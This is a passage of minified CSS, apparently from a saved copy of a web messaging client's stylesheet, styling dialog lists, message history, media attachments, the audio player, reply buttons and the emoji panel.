  1374. .im_dialogs_scrollable_wrap i.icon-verified{display:none}
  1375. .im_dialogs_col_search i.icon-verified{display:inline-block}
  1376. .im_dialogs_scrollable_wrap{outline:0!important}
  1377. .im_dialogs_scrollable_wrap .im_dialog_wrap{margin-top:0}
  1378. .im_dialogs_scrollable_wrap a.im_dialog{clear:both;overflow:hidden;color:#000;padding:8px 9px;border-radius:0}
  1379. .im_dialogs_scrollable_wrap a.im_dialog:hover,.im_dialogs_scrollable_wrap a.im_dialog_selected{border-radius:0;background:#f2f6fa}
  1380. .im_dialogs_scrollable_wrap a.im_dialog .glyphicon,.im_dialogs_scrollable_wrap a.im_dialog .icon{display:none}
  1381. .im_dialogs_scrollable_wrap .active a.im_dialog{border-radius:0;background-color:#6490b1}
  1382. .im_dialogs_scrollable_wrap .active a.im_dialog:hover,.im_dialogs_scrollable_wrap .active a.im_dialog_selected{background-color:#6490b1}
  1383. .im_dialogs_modal_list{padding-top:10px}
  1384. .im_dialog_message_wrap{word-wrap:break-word}
  1385. a.im_dialog .im_dialog_chat_from_wrap,a.im_dialog .im_short_message_media,a.im_dialog .im_short_message_service{color:#3a6d99}
  1386. a.im_dialog .im_short_message_text{color:grey}
  1387. a.im_dialog .im_dialog_draft_from{color:#c05f5a}
  1388. a.im_dialog:hover .im_short_message_text,a.im_dialog_selected .im_short_message_text{color:#698192}
  1389. .active a.im_dialog .im_dialog_chat_from_wrap,.active a.im_dialog .im_dialog_draft_from,.active a.im_dialog .im_dialog_message,.active a.im_dialog .im_short_message_media,.active a.im_dialog .im_short_message_service,.active a.im_dialog .im_short_message_text{color:#fff}
  1390. .im_dialogs_scrollable_wrap a.im_dialog_searchpeer .icon-search-clear{display:inline-block;cursor:pointer;pointer-events:all}
  1391. .im_dialogs_scrollable_wrap a.im_dialog_searchpeer,.im_dialogs_scrollable_wrap a.im_dialog_searchpeer:hover,.im_dialogs_scrollable_wrap a.im_dialog_searchpeer_selected{background:#f3f3f3}
  1392. .im_dialog_peer{color:#222;font-weight:700;margin-top:2px;margin-bottom:2px}
  1393. .active .im_dialog_peer{color:#fff}
  1394. .im_dialog_badge{background:#64c270;font-size:11px;padding:5px;border-radius:11px;min-width:21px;text-align:center;margin-top:4px}
  1395. .active .im_dialog_badge{color:#428bca;background-color:#fff}
  1396. .im_dialogs_modal_col .im_dialog_badge{display:none}
  1397. .im_dialog_badge_muted{background:#bfbfbf}
  1398. .im_dialog_unread{background:#c1d6e5;display:inline-block;float:right;width:8px;height:8px;border-radius:5px;overflow:hidden;margin:12px 0 0}
  1399. a.im_dialog:hover .im_dialog_unread,a.im_dialog_selected .im_dialog_unread{background:#a3c0d4}
  1400. .active .im_dialog_unread{background-color:#a4c4dd}
  1401. .im_dialog_pinned{display:inline-block;float:right;width:14px;height:14px;overflow:hidden;margin:12px 0 0;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-13px -916px}
  1402. .is_2x .im_dialog_pinned{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1403. .active .im_dialog_pinned,a.im_dialog:hover .im_dialog_pinned,a.im_dialog_selected .im_dialog_pinned{background-position:-13px -916px}
  1404. .im_dialog_date{color:#b3b3b3;font-size:.85em}
  1405. a.im_dialog:hover .im_dialog_date,a.im_dialog_selected .im_dialog_date{color:#91a6ba}
  1406. .active .im_dialog_date,.active a.im_dialog:hover .im_dialog_date,.active a.im_dialog_selected .im_dialog_date{color:#b8d1e4}
  1407. .im_dialog_message,.im_dialog_peer{overflow:hidden;white-space:nowrap;text-overflow:ellipsis}
  1408. .im_dialog_message_wrap{height:44px;overflow:hidden}
  1409. .im_dialog_message{color:grey}
  1410. .icon-caret{width:8px;height:4px;display:inline-block;vertical-align:text-top;margin-top:7px;margin-left:6px;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-17px -444px}
  1411. .is_2x .icon-caret{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1412. .im_dialogs_empty_header{font-size:15px;color:grey;margin:0 0 15px}
  1413. .im_dialogs_empty_lead{color:grey;margin-bottom:18px}
  1414. .im_history_scrollable_wrap{outline:0!important;position:relative}
  1415. .im_history_to_bottom{overflow:hidden}
  1416. .im_history_to_bottom .im_history_scrollable{position:absolute;bottom:0;width:100%}
  1417. .im_history_pinned_wrap{padding:7px 10px 7px 20px;border-bottom:1px solid #E9EBED}
  1418. .im_history_pinned_message{cursor:pointer}
  1419. .im_history_pinned_message:hover{text-decoration:none}
  1420. .im_history_pinned_hide{float:right;display:block;width:18px;height:18px;margin-right:6px;margin-top:11px;-webkit-transform:translate3d(0,0,0);padding-top:7px}
  1421. .im_history_pinned_hide .icon-reply-bar{display:block;background:#999;width:18px;height:2px;transform-origin:50% 50%}
  1422. .im_history_pinned_hide:hover .icon-reply-bar{background:#44a1e8}
  1423. .im_history{padding:0;position:relative}
  1424. .im_message_unread_split{background:#f0f4f7;color:#8096a8;text-align:center;padding:4px 10px;margin:10px 0}
  1425. .im_message_author,.im_message_fwd_author{color:#3a6d99;font-weight:700}
  1426. .im_message_author_via,.im_message_fwd_via{color:#3a6d99}
  1427. .im_message_author_via:hover,.im_message_fwd_via:hover{text-decoration:none}
  1428. .im_message_author_via:hover .im_message_fwd_author,.im_message_fwd_via:hover .im_message_fwd_author{text-decoration:underline}
  1429. .non_osx .im_message_author_wrap,.non_osx .im_message_fwd_author_wrap{font-size:12px}
  1430. .im_message_author_via{color:#3a6d99;margin-left:5px}
  1431. .im_message_fwd_via{margin-left:0}
  1432. .im_message_author_admin{color:#adadad;margin-left:6px;font-size:11px}
  1433. .im_message_contact_photo,.im_message_from_photo,.im_message_fwd_photo{width:42px;height:42px;border-radius:50%;overflow:hidden}
  1434. .im_message_contact_photo .peer_initials,.im_message_from_photo .peer_initials,.im_message_fwd_photo .peer_initials{line-height:42px}
  1435. a.im_message_contact_photo,a.im_message_from_photo{margin:0 15px 0 0}
  1436. .non_osx .im_message_contact_name{font-size:12px}
  1437. .im_message_contact_name{font-weight:700}
  1438. .im_message_contact_name,.im_message_contact_phone{white-space:nowrap}
  1439. a.im_message_photo_thumb,a.im_message_video_thumb{display:block;overflow:hidden;border-radius:2px}
  1440. img.im_message_photo_thumb,img.im_message_video_thumb{overflow:hidden;border-radius:2px}
  1441. .im_message_video,a.im_message_photo_thumb{margin-top:5px}
  1442. a.im_message_video_thumb{float:left;margin-right:15px;position:relative}
  1443. img.im_message_video_thumb_blurred{-webkit-filter:blur(2px);-moz-filter:blur(2px);-o-filter:blur(2px);-ms-filter:blur(2px);filter:blur(2px);filter:progid:DXImageTransform.Microsoft.Blur(PixelRadius='2')}
  1444. div.im_message_video_thumb{position:relative}
  1445. .im_message_video_duration{background:rgba(0,0,0,.4);color:#fff;position:absolute;bottom:4px;right:4px;padding:2px 6px;font-size:11px;line-height:15px;border-radius:2px;overflow:hidden;z-index:1}
  1446. .icon-videoplay{position:absolute;display:inline-block;top:50%;left:50%;margin-left:-5px;margin-top:-9px;z-index:1;width:0;height:0;border-style:solid;border-width:9px 0 9px 14px;border-color:transparent transparent transparent #fff}
  1447. .im_message_geopoint{border-radius:2px;margin-top:5px;overflow:hidden;display:block;position:relative;width:300px;height:150px}
  1448. .im_message_venue_geopoint_wrap{display:block;position:relative;overflow:hidden;width:100px;height:100px;margin-right:10px;float:left;border-radius:2px;background:#f2f2f2;text-align:center;line-height:0}
  1449. .icon-geo-point{position:absolute;display:inline-block;top:50%;left:50%;margin-left:-8px;margin-top:-15px;width:15px;height:19px;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-14px -389px}
  1450. .is_2x .icon-geo-point{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1451. .im_message_media_embed{position:relative;height:0;overflow:hidden;margin-top:5px}
  1452. .im_message_media_embed iframe,.im_message_media_embed webview{position:absolute;top:0;left:0;width:100%;height:100%}
  1453. .im_message_webpage_wrap{margin:3px 0;border-left:2px solid #7eaad1;padding-left:12px}
  1454. .im_message_webpage_site{color:#999;font-weight:400;line-height:120%;margin-bottom:3px}
  1455. .im_message_webpage_title{font-weight:700}
  1456. .im_message_sign{padding-top:1px}
  1457. .im_message_sign_link{pointer-events:none;color:#adadad;font-size:.95em}
  1458. .icon-circle{display:none;width:.5em;height:.5em;border-radius:.5em;background:#999;overflow:hidden;vertical-align:middle;margin:-2px 3px 0}
  1459. .im_message_webpage_description{margin:2px 0}
  1460. .im_message_webpage_article_photo{display:block;margin:5px 0 5px 5px}
  1461. .im_message_video_embed{padding-bottom:56.25%}
  1462. .im_message_insta_embed{padding-bottom:122%}
  1463. .im_message_vine_embed{padding-bottom:100%}
  1464. .im_message_soundcloud_embed{padding-bottom:56.25%}
  1465. .im_message_spotify_embed{width:300px;height:80px}
  1466. .im_message_twitter_embed>blockquote{visibility:hidden}
  1467. .im_message_webpage_gif .img_gif_with_progress_wrap{margin-top:5px;display:block}
  1468. .im_message_gif_wrap{position:relative}
  1469. .img_gif_with_progress_wrap{display:inline-block;line-height:0}
  1470. .im_message_gif_btn{color:#fff;font-style:normal;font-weight:700;position:absolute;display:inline-block;top:50%;left:50%;margin-left:-22px;margin-top:-21px;border:2px solid #fff;border-radius:20px;padding:10px;z-index:1}
  1471. .im_message_audio,.im_message_document,.im_message_upload_file,.im_message_video{margin-top:3px;width:317px}
  1472. .im_message_audio{margin-top:3px}
  1473. .im_message_file_button{display:block;background:rgba(218,228,234,.5);float:left;width:42px;height:42px;border-radius:50%;margin-right:10px}
  1474. .im_message_file_button_icon{display:inline-block;line-height:0;width:12px;height:18px;margin:12px 15px;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-14px -509px}
  1475. .is_2x .im_message_file_button_icon{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1476. .im_message_file_button_dl_doc .im_message_file_button_icon{background-position:-12px -561px;width:16px;height:18px;margin:13px}
  1477. .im_message_file_button_dl_audio{background:#6490b1;border-radius:50%}
  1478. .im_message_file_button_dl_audio .im_message_file_button_icon{display:block;width:14px;height:16px;margin:13px 16px;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-13px -611px}
  1479. .is_2x .im_message_file_button_dl_audio .im_message_file_button_icon{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1480. .im_message_file_button_dl_audio .audio_player_btn_icon_pause,.is_1x .im_message_file_button_dl_audio .audio_player_btn_icon_pause{width:12px;height:14px;background-position:-14px -587px;margin:14px 15px}
  1481. .im_history_select_active .im_message_outer_wrap:hover .icon-document,.im_message_selected .icon-document{background-color:#dae6f0;background-position:-2px -542px}
  1482. .im_history_select_active .clickable,.im_history_select_active a,.im_history_select_active button{pointer-events:none}
  1483. .im_message_document_link_disabled{cursor:default;pointer-events:none}
  1484. .im_message_document_info{float:left}
  1485. .im_message_document_thumb_wrap{border-radius:2px;overflow:hidden;background:#f2f2f2;width:100px;min-height:38px;max-height:100px;margin-right:10px;text-align:center;float:left;line-height:0}
  1486. img.im_message_document_thumb{max-width:100px;max-height:100px;vertical-align:middle}
  1487. .im_message_document_name_wrap{overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:265px;padding:0 0 1px}
  1488. .im_message_document_actions{width:265px}
  1489. .im_message_document_name{color:#3a6d99;display:inline-block;font-weight:700;max-width:170px;overflow:hidden;vertical-align:text-top;white-space:nowrap;text-overflow:ellipsis}
  1490. .im_message_document_name:after{content:attr(data-name);display:block;overflow:hidden;text-overflow:ellipsis}
  1491. .im_message_document_name:before{content:attr(data-ext);float:right}
  1492. .im_message_document_name:hover:before{text-decoration:underline}
  1493. .im_message_document_size{color:#999;padding-left:2px;vertical-align:text-top}
  1494. .audio_player_actions a,.im_message_document_actions a{margin-right:10px}
  1495. .audio_player_title_wrap{overflow:hidden;white-space:nowrap;text-overflow:ellipsis;padding:1px 0;line-height:16px;height:19px;width:200px}
  1496. .audio_player_title{display:inline-block;font-weight:700;max-width:100px;overflow:hidden;vertical-align:text-top;white-space:nowrap;text-overflow:ellipsis}
  1497. .icon-audio-unread{display:inline-block;width:6px;height:6px;background:#4eabf1;border:0;border-radius:4px;margin:5px 5px 0 2px;vertical-align:text-top}
  1498. .audio_player_meta{overflow:hidden;vertical-align:text-top;display:inline-block}
  1499. .audio_player_duration,.audio_player_size{color:#999;padding-left:2px}
  1500. .audio_player_actions{margin-top:3px}
  1501. .audio_player_seek_slider{float:left;margin-right:15px;width:200px}
  1502. .audio_player_seek_slider .tg_slider_wrap{height:18px;line-height:18px}
  1503. .audio_player_seek_slider .tg_slider_track{margin:7px 0;background:rgba(218,228,234,.5);height:4px;border-radius:0}
  1504. .audio_player_seek_slider .tg_slider_track_fill{background:#6490b1;height:4px;width:0}
  1505. .audio_player_seek_slider .tg_slider_thumb{display:none}
  1506. .audio_player_seek_slider:hover .tg_slider_thumb{display:block}
  1507. .audio_player_volume_slider{width:50px;float:left}
  1508. .audio_player_volume_slider .tg_slider_wrap{height:18px;line-height:18px}
  1509. .audio_player_volume_slider .tg_slider_thumb{display:none;background:#6490b1;width:4px;height:10px;line-height:16px;margin-top:4px;border-radius:0}
  1510. .audio_player_volume_slider:hover .tg_slider_thumb{display:block}
  1511. .audio_player_volume_slider .tg_slider_track{margin:7px 0;background:rgba(218,228,234,.5);height:4px}
  1512. .audio_player_volume_slider .tg_slider_track_fill{background:#6490b1;height:4px;width:0}
  1513. .audio_player_progress_wrap{overflow:hidden}
  1514. .audio_player_progress_wrap .tg_down_progress{margin-top:5px}
  1515. .audio_player_media{position:absolute;visibility:hidden}
  1516. .audio_player_media canvas{display:none}
  1517. .im_message_download_progress_wrap,.im_message_upload_progress_wrap{margin-top:5px;width:200px}
  1518. .im_message_document_thumbed .im_message_document_actions,.im_message_document_thumbed .im_message_document_name_wrap,.im_message_document_thumbed .im_message_download_progress_wrap,.im_message_document_thumbed .im_message_upload_progress_wrap{width:207px}
  1519. .im_message_document_thumbed .im_message_document_name{max-width:110px}
  1520. .im_message_video .im_message_document_actions,.im_message_video .im_message_document_name_wrap,.im_message_video .im_message_download_progress_wrap{width:152px}
  1521. .im_message_video .im_message_document_name_wrap{margin-top:5px}
  1522. .im_message_cancelable_progress_wrap,.im_message_playback_progress_wrap{margin-top:4px}
  1523. .im_message_media_progress_cancel{margin-left:15px;line-height:100%;width:50px;display:block;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}
  1524. .tg_down_progress,.tg_up_progress{height:4px;margin:0;padding:0;background:rgba(218,228,234,.5);border:0;border-radius:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}
  1525. .tg_down_progress .progress-bar,.tg_up_progress .progress-bar{height:4px;line-height:4px;background:#6B9ABD;border-radius:0;overflow:hidden;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}
  1526. .im_service_message_wrap{text-align:center}
  1527. .im_bot_intro_message_wrap{max-width:300px;padding:4px 10px;margin:10px auto;color:#000;line-height:1.4;text-align:left;font-size:13px}
  1528. .im_bot_intro_message_header{font-weight:700;text-align:center}
  1529. .im_bot_intro_message{margin-top:10px}
  1530. .im_service_message{display:block;min-width:10px;padding:4px 7px;line-height:1.4;color:#999;text-align:center;border-radius:10px;margin:5px 0}
  1531. .im_service_message_photo_thumb{display:inline-block;margin:0 auto}
  1532. .im_service_message .im_service_message_pinned{color:inherit;font-weight:700;display:inline-block;max-width:150px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;vertical-align:middle}
  1533. .im_service_message_phonecall{color:inherit!important;font-weight:700}
  1534. .im_service_message_phonecall_duration{font-weight:400}
  1535. .im_message_date,.im_message_fwd_date{color:#adadad;font-size:.85em;padding:0 0 20px 10px}
  1536. .im_message_edited{display:none}
  1537. .im_message_date_text{cursor:pointer}
  1538. .im_message_date_text:hover{text-decoration:underline}
  1539. div.im_message_author,div.im_message_body{display:block;overflow:hidden}
  1540. .im_message_body{-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;user-select:text}
  1541. .im_message_error_btn{display:none}
  1542. .im_message_error .im_message_error_btn{display:inline}
  1543. .im_message_error_btn .icon-message-status{background:#da564d;opacity:.85;pointer-events:auto}
  1544. .im_message_error_btn .icon-message-status:hover{opacity:1}
  1545. .im_message_views_wrap{position:relative}
  1546. .im_message_views{display:inline-block;position:absolute;white-space:nowrap;line-height:normal}
  1547. .im_message_views_inline{display:inline-block;white-space:nowrap;font-size:.85em;margin-left:5px}
  1548. .icon-message-views{display:inline-block;width:16px;height:11px;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-12px -850px;vertical-align:text-bottom;margin-right:.3rem}
  1549. .is_2x .icon-message-views{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1550. .im_history_select_active .im_message_outer_wrap:hover .icon-message-views,.im_message_selected .icon-message-views,.message_focus .icon-message-views{background-position:-12px -871px}
  1551. .im_message_views_cnt{color:#adadad;font-weight:700;vertical-align:top}
  1552. .im_message_reply_wrap{display:block;color:inherit;text-decoration:none;margin-bottom:5px;margin-top:2px;overflow:hidden}
  1553. .im_message_reply_wrap:hover{text-decoration:none;color:inherit}
  1554. .im_message_reply_border{background:#7eaad1;height:33px;width:2px;position:absolute;margin-left:-12px}
  1555. .im_message_reply{padding-left:12px}
  1556. .im_message_reply_thumb_wrap{display:block;float:left;width:42px;height:42px;text-align:center;position:absolute}
  1557. .im_message_reply_author{font-weight:700;color:#3a6d99;line-height:16px;margin-bottom:3px}
  1558. .non_osx .im_message_reply_author{font-size:12px}
  1559. .im_message_reply_loading{padding:7px 0 8px}
  1560. .im_message_reply_body .im_short_message_media,.im_message_reply_body .im_short_message_service{color:#999}
  1561. .im_message_reply_body{line-height:16px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;margin-bottom:1px}
  1562. .im_message_reply_thumbed .im_message_reply_border,.im_message_reply_thumbed .im_message_reply_wrap{height:42px}
  1563. .im_message_reply_thumbed .im_message_reply_author{margin-top:4px}
  1564. .im_message_reply_thumbed .im_message_reply_author,.im_message_reply_thumbed .im_message_reply_body{margin-left:52px}
  1565. .im_message_reply_wrap .im_message_reply_thumbed{margin-bottom:4px}
  1566. a.im_message_fwd_photo{position:absolute;margin-top:1px}
  1567. .im_message_fwd_date{padding:0}
  1568. .im_message_text{word-wrap:break-word;line-height:150%;white-space:pre-wrap}
  1569. .im_message_document_caption,.im_message_photo_caption,.im_message_video_caption{margin-top:3px;clear:both;word-wrap:break-word;line-height:150%;white-space:pre-wrap}
  1570. .im_message_mymention{background:#fff8cc}
  1571. .reply_markup_wrap{margin:15px -2px 0}
  1572. .im_message_keyboard .reply_markup_wrap{margin-top:7px}
  1573. .reply_markup_row{padding:4px 0;line-height:0}
  1574. .reply_markup_row:first-child{padding-top:0}
  1575. .reply_markup_row:last-child{padding-bottom:0}
  1576. .reply_markup_scrollable_wrap.active-scrollbar .reply_markup_row{margin-right:6px}
  1577. .reply_markup_button_wrap{display:inline-block;padding:0 4px}
  1578. .reply_markup_button{color:#3a6d99;display:block;width:100%;background:#f0f4f7;height:30px;font-size:13px;margin:0;padding:6px;overflow:hidden;text-overflow:ellipsis}
  1579. .reply_markup_h1 .reply_markup_button{height:170px}
  1580. .reply_markup_h2 .reply_markup_button{height:81px}
  1581. .reply_markup_h3 .reply_markup_button{height:51px}
  1582. .reply_markup_h4 .reply_markup_button{height:36px}
  1583. .reply_markup_button:focus,.reply_markup_button:hover{color:#3a6d99;background:#dfe8f0}
  1584. .reply_markup_button_w1{width:100%}
  1585. .reply_markup_button_w2{width:50%}
  1586. .reply_markup_button_w3{width:33.3333333%}
  1587. .reply_markup_button_w4{width:25%}
  1588. .reply_markup_button_w5{width:20%}
  1589. .reply_markup_button_w6{width:16.6666666%}
  1590. .reply_markup_button_w7{width:14.2857142%}
  1591. .reply_markup_button_w8{width:12.5%}
  1592. .reply_markup_button_w9{width:11.1111111%}
  1593. .reply_markup_button_w10{width:10%}
  1594. .reply_markup_button_w11{width:9.09090909%}
  1595. .reply_markup_button_w12{width:8.33333333%}
  1596. .im_history_not_selected_wrap{display:none}
  1597. .im_page_peer_not_selected .im_history_not_selected_wrap{display:block}
  1598. .im_history_selected_wrap{display:none}
  1599. .im_history_loaded .im_history_selected_wrap{display:block}
  1600. .im_page_peer_not_selected .im_history_selected_wrap{display:none}
  1601. .im_history_selected_loading_wrap{display:block}
  1602. .im_history_loaded .im_history_selected_loading_wrap,.im_page_peer_not_selected .im_history_selected_loading_wrap{display:none}
  1603. .im_history_empty,.im_history_not_selected{visibility:hidden;text-align:center;color:#999;font-size:16px;line-height:18px;padding:1px 50px;margin:0}
  1604. .im_history_empty.vertical-aligned,.im_history_not_selected.vertical-aligned{visibility:visible}
  1605. .im_history_to_bottom .im_history_empty,.im_history_to_bottom .im_history_not_selected{display:none}
  1606. .im_history_loading{width:35px;margin:0 auto;visibility:hidden}
  1607. .im_history_loading.vertical-aligned{visibility:visible}
  1608. .im_history_loading_more{display:block;width:26px;height:46px;margin:0 auto;padding:20px 0 0;visibility:hidden}
  1609. .im_history_loading_more .progress-arc-wrap{display:none}
  1610. .im_history_loading_more.im_history_loading_more_active{visibility:visible}
  1611. .im_history_loading_more.im_history_loading_more_active .progress-arc-wrap{display:block}
  1612. .im_history_loading_less{display:block;width:26px;margin:0 auto;visibility:hidden}
  1613. .im_history_loading_less .progress-arc-wrap{display:none}
  1614. .im_history_loading_less.im_history_loading_less_active{visibility:visible}
  1615. .im_history_loading_less.im_history_loading_less_active .progress-arc-wrap{display:block}
  1616. .im_send_panel_wrap{margin:0 auto;padding:10px 15px 30px}
  1617. .im_send_form_wrap{position:relative}
  1618. .im_send_form{margin:0 auto;position:absolute;bottom:0}
  1619. .im_attach_input,.im_media_attach_input{cursor:pointer;font-size:120px!important;opacity:.01;position:absolute;z-index:100;margin:0;padding:0;top:0;right:0}
  1620. .im_send_dropbox_wrap{background:#fff;display:none;padding:17px 10px 0;border:1px dashed #999;overflow:hidden;text-align:center;color:#999;position:absolute}
  1621. .im_send_form_dragging .im_send_dropbox_wrap{display:block}
  1622. .im_send_form_dragging .composer_command_btn,.im_send_form_dragging .composer_emoji_insert_btn,.im_send_form_dragging .composer_keyboard_btn,.im_send_form_dragging .composer_progress_icon_wrap,.im_send_form_dragging .composer_rich_textarea,.im_send_form_dragging .im_inline_placeholder_wrap,.im_send_form_dragging .im_message_field{visibility:hidden}
  1623. .im_send_field_wrap{position:relative}
  1624. textarea.im_message_field{font-size:12px;margin-bottom:10px;padding:6px;min-height:50px;height:50px;resize:none}
  1625. .im_inline_placeholder_wrap{color:#9aa2ab;position:absolute;margin-top:2px;white-space:nowrap;pointer-events:none;text-overflow:ellipsis;display:none;width:100%;width:calc(100% - 30px);overflow:hidden}
  1626. .im_inline_placeholder_wrap.active{display:block}
  1627. .im_inline_placeholder_prefix{visibility:hidden}
  1628. .icon-online{background:#6ec26d;border:1px solid #fff;display:block;width:11px;height:11px;border-radius:6px;overflow:hidden;position:absolute;margin-top:-7px;margin-left:33px}
  1629. .im_send_reply_wrap{margin-bottom:5px}
  1630. .im_send_reply_form_wrap a.im_panel_own_photo,.im_send_reply_form_wrap a.im_panel_peer_photo{margin-top:41px}
  1631. .im_send_reply_cancel{float:right;display:block;width:18px;height:18px;margin-right:6px;margin-top:5px;-webkit-transform:translate3d(0,0,0);padding-top:7px}
  1632. .im_send_reply_cancel .icon-reply-bar{display:block;background:#999;width:18px;height:2px;transform-origin:50% 50%}
  1633. .im_send_reply_cancel:hover .icon-reply-bar{background:#44a1e8}
  1634. .icon-reply-bar:first-child{-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);-o-transform:rotate(-45deg);-ms-transform:rotate(-45deg);transform:rotate(-45deg);transform-origin:50% 50%}
  1635. .icon-reply-bar:last-child{-webkit-transform:translate3d(0,-2px,0) rotate(45deg);-moz-transform:translate3d(0,-2px,0) rotate(45deg);-o-transform:translate3d(0,-2px,0) rotate(45deg);-ms-transform:translate3d(0,-2px,0) rotate(45deg);transform:translate3d(0,-2px,0) rotate(45deg)}
  1636. .img_fullsize_wrap,a.img_fullsize{display:block;text-align:center}
  1637. img.img_fullsize{margin:0 auto}
  1638. .document_modal_image_wrap{overflow:auto}
  1639. .document_fullsize_wrap{display:none;cursor:zoom-in;text-align:center}
  1640. .document_fullsize_zoomed{cursor:zoom-out}
  1641. .document_fullsize_img{-webkit-user-select:none}
  1642. .document_fullsize_zoomed .document_fullsize_img{-webkit-user-select:none;image-rendering:optimizeSpeed;image-rendering:-moz-crisp-edges;image-rendering:-o-crisp-edges;image-rendering:-webkit-optimize-contrast;image-rendering:optimize-contrast;-ms-interpolation-mode:nearest-neighbor}
  1643. .video_full_player video{background:#000}
  1644. .media_modal_info{color:#999;margin:20px 0 0}
  1645. .media_modal_actions{margin-top:20px}
  1646. .media_modal_action_link{margin-left:15px}
  1647. .media_modal_author{color:inherit;font-weight:700}
  1648. .media_modal_author:hover{color:inherit}
  1649. .non_osx .media_modal_author{font-size:12px}
  1650. .composer_progress_enabled-add,.composer_progress_enabled-remove{transition-duration:.2s}
  1651. .composer_progress_icon_wrap{position:absolute;right:3px;top:2px;width:22px;height:22px;overflow:hidden;margin-top:1px;pointer-events:none;padding:0;display:none;opacity:0}
  1652. .composer_progress_enabled-add .composer_progress_icon_wrap,.composer_progress_enabled-remove .composer_progress_icon_wrap{transition:opacity cubic-bezier(.25,.46,.45,.94) .2s;display:block}
  1653. .composer_progress_enabled .composer_progress_icon_wrap{display:block;opacity:1}
  1654. .composer_emoji_insert_btn{position:absolute;right:3px;top:2px;cursor:pointer;padding:0;width:22px;height:22px;margin-top:1px;display:block;opacity:1}
  1655. .composer_progress_enabled .composer_emoji_insert_btn{display:none;opacity:0}
  1656. .composer_progress_enabled-add .composer_emoji_insert_btn,.composer_progress_enabled-remove .composer_emoji_insert_btn{transition:opacity cubic-bezier(.25,.46,.45,.94) .2s;display:block}
  1657. .icon-emoji{display:inline-block;width:22px;height:22px;vertical-align:top;opacity:.8;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-9px -335px}
  1658. .is_2x .icon-emoji{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1659. .composer_emoji_tooltip{display:none;position:absolute;z-index:999;width:286px;margin-left:-133px;margin-top:-330px;border:1px solid #dfdfdf;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.1);-moz-box-shadow:0 1px 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1);background:#fff;padding:0}
  1660. .composer_emoji_tooltip_shown{display:block}
  1661. .composer_emoji_tooltip_tail{position:absolute;bottom:-14px;left:50%;margin-left:-13px;overflow:hidden;width:26px;height:14px}
  1662. .icon-tooltip-tail{background:#fff;width:18px;height:18px;display:inline-block;border:1px solid #dfdfdf;border-width:0 1px 1px 0;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;position:relative;top:-8px;left:4px;-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-o-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);-webkit-box-shadow:1px 1px 1px rgba(0,0,0,.1);-moz-box-shadow:1px 1px 1px rgba(0,0,0,.1);box-shadow:1px 1px 1px rgba(0,0,0,.1)}
  1663. .composer_emoji_tooltip_tabs{-webkit-box-shadow:0 1px 0 0 rgba(0,0,0,.1);-moz-box-shadow:0 1px 0 0 rgba(0,0,0,.1);box-shadow:0 1px 0 0 rgba(0,0,0,.1);padding-top:2px}
  1664. .composer_emoji_tooltip_tab{cursor:pointer;display:inline-block;line-height:33px;text-align:center;width:50%;text-transform:uppercase;font-weight:700;transition:color ease-in-out .2s}
  1665. .composer_emoji_tooltip_tab:active,.composer_emoji_tooltip_tab:focus,.composer_emoji_tooltip_tab:hover{text-decoration:none}
  1666. .composer_emoji_tooltip_tab_emoji,.composer_emoji_tooltip_tabs_stickers_active .composer_emoji_tooltip_tab_stickers{color:#53a9ea}
  1667. .composer_emoji_tooltip_tab_stickers,.composer_emoji_tooltip_tabs_stickers_active .composer_emoji_tooltip_tab_emoji{color:#999}
  1668. .composer_emoji_tooltip_tab_shadow{width:50%;height:1px;background:#53a9ea;-webkit-box-shadow:0 1px 0 0 #53a9ea;-moz-box-shadow:0 1px 0 0 #53a9ea;box-shadow:0 1px 0 0 #53a9ea;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);transform:translate3d(0,0,0);transition:transform ease-in-out .2s}
  1669. .composer_emoji_tooltip_tabs_stickers_active .composer_emoji_tooltip_tab_shadow{-webkit-transform:translate3d(100%,0,0);-moz-transform:translate3d(100%,0,0);-o-transform:translate3d(100%,0,0);-ms-transform:translate3d(100%,0,0);transform:translate3d(100%,0,0)}
  1670. .composer_emoji_tooltip_categories{width:100%;line-height:0}
  1671. .composer_emoji_tooltip_tab_emoji_content .composer_emoji_tooltip_categories{width:100%;margin:0 0 3px;padding:0 5px 15px;line-height:0}
  1672. .composer_emoji_tooltip_tab_stickers_content .composer_emoji_tooltip_categories{vertical-align:top;padding:0 5px 15px;margin:0 0 3px;overflow-x:scroll;white-space:nowrap;position:relative}
  1673. .composer_emoji_tooltip_tab_stickers_content .composer_emoji_tooltip_categories::-webkit-scrollbar{display:none}
